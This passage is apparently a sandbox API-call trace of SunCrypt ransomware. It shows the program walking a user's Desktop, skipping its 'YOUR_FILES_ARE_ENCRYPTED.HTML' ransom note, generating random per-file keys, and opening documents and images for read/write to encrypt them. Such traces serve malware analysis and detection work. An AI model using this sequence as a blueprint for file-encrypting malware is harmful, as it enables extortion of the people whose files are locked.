returned=".bmp" [0166.250] lstrlenW 
(lpString=".bmp") returned 4 [0166.250] PathFindExtensionW (pszPath="SDwqK.bmp") returned=".bmp" [0166.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2654a60, ftCreationTime.dwHighDateTime=0x1d7db27, ftLastAccessTime.dwLowDateTime=0x7b355ae0, ftLastAccessTime.dwHighDateTime=0x1d7dba5, ftLastWriteTime.dwLowDateTime=0x7b355ae0, ftLastWriteTime.dwHighDateTime=0x1d7dba5, nFileSizeHigh=0x0, nFileSizeLow=0x3be3, dwReserved0=0x0, dwReserved1=0x60, cFileName="st3fSkONVrSq.ods", cAlternateFileName="ST3FSK~1.ODS")) returned 1 [0166.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods") returned 48 [0166.250] lstrcmpW (lpString1="st3fSkONVrSq.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.250] PathFindExtensionW (pszPath="st3fSkONVrSq.ods") returned=".ods" [0166.250] lstrlenW (lpString=".ods") returned 4 [0166.250] PathFindExtensionW (pszPath="st3fSkONVrSq.ods") returned=".ods" [0166.250] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" (normalized: "c:\\users\\5alr3u30d3\\desktop\\st3fskonvrsq.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.251] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=15331) returned 1 [0166.251] GetProcessHeap () returned 0x270000 [0166.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.252] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="51") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="36") returned 2 [0166.252] 
wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F8") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="7B") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0C") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1E") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="1F") returned 2 [0166.252] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="E4") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="10") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="30") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="AF") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="9D") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FF") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="D0") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="83") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="69") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="E7") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="91") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="18") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="02") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="88") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="B0") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="21") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: 
param_1="06") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="52") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="5E") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="DB") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CD") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BC") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="37") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="F3") returned 2 [0166.253] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="21") returned 2 [0166.254] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods" [0166.254] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.262] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a, dwReserved0=0x0, dwReserved1=0x60, cFileName="SunCrypt_26_01_2021_1422KB.ps1", cAlternateFileName="SUNCRY~1.PS1")) returned 1 [0166.262] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1") returned 62 [0166.262] lstrcmpW (lpString1="SunCrypt_26_01_2021_1422KB.ps1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.262] PathFindExtensionW (pszPath="SunCrypt_26_01_2021_1422KB.ps1") returned=".ps1" [0166.262] lstrlenW (lpString=".ps1") returned 4 [0166.262] PathFindExtensionW (pszPath="SunCrypt_26_01_2021_1422KB.ps1") returned=".ps1" [0166.262] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8685d0, ftCreationTime.dwHighDateTime=0x1d7da5f, ftLastAccessTime.dwLowDateTime=0x522e2580, ftLastAccessTime.dwHighDateTime=0x1d7e5bb, ftLastWriteTime.dwLowDateTime=0x522e2580, ftLastWriteTime.dwHighDateTime=0x1d7e5bb, nFileSizeHigh=0x0, nFileSizeLow=0x6665, dwReserved0=0x0, dwReserved1=0x60, cFileName="tGZjK0vavLxa.doc", cAlternateFileName="TGZJK0~1.DOC")) returned 1 [0166.262] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc") returned 48 [0166.262] lstrcmpW (lpString1="tGZjK0vavLxa.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.262] PathFindExtensionW (pszPath="tGZjK0vavLxa.doc") returned=".doc" [0166.262] lstrlenW (lpString=".doc") returned 4 [0166.262] PathFindExtensionW (pszPath="tGZjK0vavLxa.doc") returned=".doc" [0166.262] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" (normalized: "c:\\users\\5alr3u30d3\\desktop\\tgzjk0vavlxa.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.263] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=26213) 
returned 1 [0166.263] GetProcessHeap () returned 0x270000 [0166.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.264] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="5B") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="79") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="79") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="26") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="26") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="C0") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="0A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A2") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="1F") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="17") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="10") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="6A") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AB") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="49") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DD") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="87") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C6") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="3D") returned 2 [0166.264] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="56") returned 2 
[0166.265] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="AB") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D9") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3F") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="53") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="20") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7C") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="84") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="25") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="38") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E5") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="83") returned 2 [0166.265] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7C") returned 2 [0166.266] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc" [0166.266] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.266] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.277] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ac5c10, ftCreationTime.dwHighDateTime=0x1d7d976, ftLastAccessTime.dwLowDateTime=0x3f0ef20, ftLastAccessTime.dwHighDateTime=0x1d7e47f, 
ftLastWriteTime.dwLowDateTime=0x3f0ef20, ftLastWriteTime.dwHighDateTime=0x1d7e47f, nFileSizeHigh=0x0, nFileSizeLow=0x1766e, dwReserved0=0x0, dwReserved1=0x60, cFileName="tObRHMtn3GHXI.pps", cAlternateFileName="TOBRHM~1.PPS")) returned 1 [0166.277] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps") returned 49 [0166.277] lstrcmpW (lpString1="tObRHMtn3GHXI.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.277] PathFindExtensionW (pszPath="tObRHMtn3GHXI.pps") returned=".pps" [0166.277] lstrlenW (lpString=".pps") returned 4 [0166.277] PathFindExtensionW (pszPath="tObRHMtn3GHXI.pps") returned=".pps" [0166.278] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" (normalized: "c:\\users\\5alr3u30d3\\desktop\\tobrhmtn3ghxi.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.278] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=95854) returned 1 [0166.278] GetProcessHeap () returned 0x270000 [0166.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.280] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="45") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="F2") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="37") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="76") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="3A") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D2") returned 2 [0166.280] wsprintfW (in: 
param_1=0x4ebdd5a, param_2="%02X" | out: param_1="30") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="64") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="54") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="62") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="6A") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="10") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FE") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6E") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="62") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="BD") returned 2 [0166.280] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2B") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="57") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B7") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="14") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6F") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D5") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="B4") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="3E") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="22") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="09") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="CC") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="25") returned 2 
[0166.281] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="B6") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="5B") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BA") returned 2 [0166.281] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="08") returned 2 [0166.282] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps" [0166.282] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.282] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.291] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d57ed90, ftCreationTime.dwHighDateTime=0x1d7dcfc, ftLastAccessTime.dwLowDateTime=0x77a98180, ftLastAccessTime.dwHighDateTime=0x1d7e618, ftLastWriteTime.dwLowDateTime=0x77a98180, ftLastWriteTime.dwHighDateTime=0x1d7e618, nFileSizeHigh=0x0, nFileSizeLow=0x11710, dwReserved0=0x0, dwReserved1=0x60, cFileName="ueq NoJbA.jpg", cAlternateFileName="UEQNOJ~1.JPG")) returned 1 [0166.291] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg") returned 45 [0166.291] lstrcmpW (lpString1="ueq NoJbA.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.291] PathFindExtensionW (pszPath="ueq NoJbA.jpg") returned=".jpg" [0166.291] lstrlenW (lpString=".jpg") returned 4 [0166.291] PathFindExtensionW (pszPath="ueq NoJbA.jpg") returned=".jpg" [0166.291] SystemFunction036 (in: RandomBuffer=0x4ebde04, 
RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ueq nojba.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.292] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=71440) returned 1 [0166.292] GetProcessHeap () returned 0x270000 [0166.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.400] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A2") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="83") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="86") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="72") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="BA") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="35") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5D") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DD") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="EC") returned 2 [0166.400] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C6") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="CD") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="31") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="D4") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="7E") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: 
param_1="C1") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="0B") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="B3") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="77") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="44") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="35") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A8") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="BE") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="29") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="DC") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A3") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="9A") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="85") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="FF") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BF") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CB") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="9E") returned 2 [0166.401] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0166.402] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg" [0166.402] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 
[0166.402] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.412] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x940e01b0, ftCreationTime.dwHighDateTime=0x1d7e3e9, ftLastAccessTime.dwLowDateTime=0x2d26bc50, ftLastAccessTime.dwHighDateTime=0x1d7e6a3, ftLastWriteTime.dwLowDateTime=0x2d26bc50, ftLastWriteTime.dwHighDateTime=0x1d7e6a3, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x0, dwReserved1=0x60, cFileName="UFJ2mOfKA7l3w86naRrT.doc", cAlternateFileName="UFJ2MO~1.DOC")) returned 1 [0166.412] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc") returned 56 [0166.412] lstrcmpW (lpString1="UFJ2mOfKA7l3w86naRrT.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.412] PathFindExtensionW (pszPath="UFJ2mOfKA7l3w86naRrT.doc") returned=".doc" [0166.412] lstrlenW (lpString=".doc") returned 4 [0166.412] PathFindExtensionW (pszPath="UFJ2mOfKA7l3w86naRrT.doc") returned=".doc" [0166.412] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ufj2mofka7l3w86narrt.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.413] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=68616) returned 1 [0166.413] GetProcessHeap () returned 0x270000 [0166.413] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.413] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="38") 
returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="23") returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="B3") returned 2 [0166.413] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="E5") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="7B") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="47") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FA") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="40") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="8B") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C5") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="AE") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F2") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6F") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="14") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D6") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="35") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd8a, 